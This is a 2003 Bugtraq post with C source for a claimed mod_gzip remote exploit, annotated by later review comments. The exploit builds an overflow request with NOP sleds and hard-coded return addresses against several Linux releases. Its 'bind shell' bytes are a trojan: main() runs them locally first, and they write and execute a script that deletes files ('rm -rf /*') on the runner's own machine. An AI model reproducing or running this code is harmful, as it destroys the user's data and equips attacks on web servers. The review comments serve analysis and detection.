[32526] in bugtraq
m00-mod_gzip.c
daemon@ATHENA.MIT.EDU (d4rkgr3y)
Sat Nov 22 13:05:01 2003
Date: 22 Nov 2003 02:42:33 -0000
Content-Type: text/plain; charset=windows-1251
From: d4rk@securitylab.ru (d4rkgr3y)
To: bugtraq@securityfocus.com
Message-ID: <200311011204.08480.d4rk@securitylab.ru>
We just added some new rets (return addresses)!
/* m00-mod_gzip.c
*
* mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru
*
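* Binds shell on port 63021.
* [Review note: that is the authors' claim. In the listing below, main()
* connects back to port 2003 (shellport), not 63021, and it calls the
* default_shellcode byte array as a local function (range()) before any
* socket is opened. Those bytes contain no listener; they write and run a
* destructive shell script on the machine that runs this program.]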
* Based on 85mod_gzip.c by xCrZx // crazy_einstein@yahoo.com
*
* Available targets:
* Suse 8.1
* RedHat 7.3
* RedHat 8.0
* RedHat 9.0
* Mandrake 9.1
*
*
* Testing:
* sh-2.05b$ ./m00-mod_gzip localhost 80
*
* mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru
*
* [~] Connecting to localhost:80
* [~] Connected!
* [~] Trying to connect to localhost:63021 port!!!
* [~] Sleeping...
*
* [+] Shell spawned! w00t!!!
*
* uid=99(nobody) gid=99(nobody) groups=99(nobody)
* Linux localhost 2.4.21-0.13mdk #1 Fri Nov 22 15:08:06 EST 2003 i686 unknown unknown GNU/Linux
* 20:29:44 up 2:29, 3 users, load average: 0.04, 0.09, 0.11
*
*
* Greets to:
* - nerF security team // www.nerf.ru
* - LimpidByte // lbyte.sysdrop.org
* - priv8security (especially to wsxz =)) // www.priv8security.com
* - UHAGr // www.uhagr.com
* - ech0 // x25.cc
* - ppl from EFnet@m00sec and #nerf
* - all our friends from #xakep@DALnet
*
* Authors:
* - Over_G // overg[at]mail.ru
* - d4rkgr3y // d4rk[at]securitylab.ru
*
* Released 22/11/03 // www.m00.ru
*/
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
// Default amount subtracted from the candidate return address after each
// attempt (main() copies it into `step` and does `ret -= step`).
#define STEP 1000
// printf-style template for the one HTTP request main() builds with sprintf().
// Argument order at the call site is: buf1 (query string on the request line),
// victim (Host header), strlen(buf2) (Content-Length), buf2 (request body).
// NOTE(review): as filled in by main(), buf1 is several kilobytes long and
// starts with a long run of 0x90 bytes, so the request line is far larger than
// ordinary traffic. Oversized request lines with non-printable bytes are
// something access logs, request-line limits or an IDS rule can flag.
// The Accept-Encoding header asks for a compressed response, presumably so
// that the compression module handles the request (confirm against the advisory).
char fmt[] =
"POST /?%s HTTP/1.1\r\n"
"Content-Type: text/html\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"Accept-Encoding: gzip, deflate\r\n\r\n"
"%s\r\n\r\n";
//shellcode for Linux x86 -> bind shell on 63021 port//
char default_shellcode[] =
"\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50"
"\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51"
"\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B"
"\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F"
"\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0"
"\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01"
"\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F"
"\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80";
// Per-distribution table. Each entry holds a display name, two hard-coded
// addresses stored as long, and pointers to the two byte strings main()
// copies into the request (shellcode -> body, jmp -> query string).
// NOTE(review): every entry points at the same default_shellcode array; see
// the note on that array for what those bytes actually contain.
// NOTE(review): the table has no terminating entry with distr == NULL, yet
// usage() walks it until it finds one, and main() indexes it with an
// unchecked atoi() of the -t argument.
// NOTE(review): fixed stack/libc addresses like these presumably assume a
// non-randomised address space on the listed releases.
struct TARGETS {
// human-readable distribution name printed by usage()
char *distr;
// value main() uses as the initial `ret` when -t selects this entry
long ret;
// value main() writes once into buf1 as `ret_err`
long std_err;
// byte string copied into the request body
char *shellcode;
// byte string copied into the query-string buffer after the first 0x90 run
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 9.0", // flavour info
0xbfffc8a2, // ret_addr in stack
0x31823610, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x71\x71\x71\x71\xff\xe3"
},
{"RedHat 8.0", // flavour info
0xbfffd8f0, // ret_addr in stack
0x42127480, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"
},
{"RedHat 7.3", // flavour info
0xbffcf610, // ret_addr in stack
0x42131806, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"
},
{"SuSe 8.1", // flavour info
0xbfc917c0, // ret_addr in stack
0x58184617, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x63\x63\x63\x63\xff\xe3"
},
{"Mandrake 9.1", // flavour info
0xbc04172f, // ret_addr in stack
0x41196735, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x49\x49\x49\x49\xff\xe3"
}
};
// Turn `hostname` into an IPv4 address held in a long.
// First tries inet_addr() on the string; if that result compares below zero,
// falls back to gethostbyname() and copies h_length bytes of the first address.
// On lookup failure it prints the error with perror() and exits the process
// with status -1, so it never returns an error value to the caller.
// NOTE(review): no header visible in this listing declares inet_addr(),
// memcpy() or exit(). The "< 0" failure test only works if the inet_addr()
// result is treated as signed; with the real unsigned prototype and a 64-bit
// long the comparison would never be true.
// NOTE(review): memcpy() trusts he->h_length and does not check it against
// sizeof ipaddr.
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
// Print the command-line synopsis followed by the index and name of each
// targets[] entry, then terminate the process with exit(0). Does not return.
// NOTE(review): the loop stops only at an entry whose distr is NULL. The
// targets[] initialiser in this listing has no such sentinel, so the loop
// reads past the last element (undefined behaviour).
void usage(char *prog) {
int i=0;
printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]\n\nTargets:\n",prog);
while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr);
printf("\n");
exit(0);
}
// Program entry point.
// Order of operations as written: print banner, parse options, call the
// default_shellcode array as a local function, and only then build and send
// the HTTP request and try a follow-up connection to `shellport`.
// NOTE(review): because the local call comes first, the network code below is
// only reached if that call returns; the decoded bytes end in execve/exit, so
// it is unlikely to. Read this function as analysis material, not as a tool.
int main(int argc, char **argv) {
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
// function pointer that is later aimed at default_shellcode and called
void (*range)();
// NOTE(review): the header comment and sample transcript say port 63021;
// the code connects to 2003 and has no option to change it.
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nmod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru\n\n");
// Option parsing. The loop starts at argv[0], looks only at the second
// character of each argument (no check for a leading '-' or for length),
// and reads argv[i+1] without checking that it exists.
for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
// -t value is used directly as an index into targets[] with no range check
if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
// %x expects unsigned int*, but &ret is long*
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
}
if(!victim || ret==0) usage(argv[0]);
ret_err=targets[trg].std_err;
shellcode=targets[trg].shellcode;
// NOTE(review): the next two statements point `range` at default_shellcode
// and call it, i.e. the byte array is executed inside THIS process on the
// local machine, before any connection is made. Nothing in a remote client
// needs this. See the decoding note on default_shellcode for what the bytes
// contain. The cast-on-the-left-hand-side form is an old compiler extension
// and is rejected by current compilers.
(long) range=default_shellcode;
range();
jmp=targets[trg].jmp;
// %x is used with long arguments here
printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
if(brutemode) printf(" ,step = %d\n",step);
printf("\n");
if(brutemode)printf("[~] Brutemode activated!\n");
// One pass per attempt; repeats forever while brutemode is set.
do {
// return value of socket() is not checked
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);
if(!brutemode)printf("\n[~] Connecting to %s:%d\n",victim,port);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
// format string has no conversion for the extra argument i
if(!brutemode)printf("[~] Connected!\n",i);
memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);
// buf1 becomes the query string: 2016 bytes of 0x90, the target's jmp
// bytes, 2280 more 0x90 bytes, then ret_err and ret written at the
// current end of the string. Every append position comes from strlen().
memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;
// buf2 becomes the body: 1000 bytes of 0x90 followed by the shellcode bytes
memset(buf2,0x90,1000);
memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
// NOTE(review): on the wire this is a POST whose request line exceeds
// 4 KB and whose body starts with 1000 x 0x90, both usable as detection
// features. sprintf() is unbounded and %d is given a size_t.
sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
// return value of write() is ignored
write(sock,tmp,strlen(tmp));
}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}
close(sock);
// next attempt uses a lower candidate address
ret-= step;
if(brutemode) {printf(".");fflush(stdout);}
if(!brutemode) {
printf("[~] Trying to connect to %s:%d port!!!\n",victim,shellport);
printf("[~] Sleeping...\n");
}
sleep(2);
// Second connection: same host, port `shellport`.
sock=socket(PF_INET,SOCK_STREAM,0);
bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("\n[+] Shell spawned! w00t!!!\n\n");
// first bytes sent on the second connection; a fixed string
write(sock, "id;uname -a\n", 12);
// Relay loop: copy socket -> stdout and stdin -> socket until the peer
// closes. The return value of select() is not checked.
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");
close(sock);
} while ( brutemode );
return 0;
}
// m00000000000oooooooooooooooo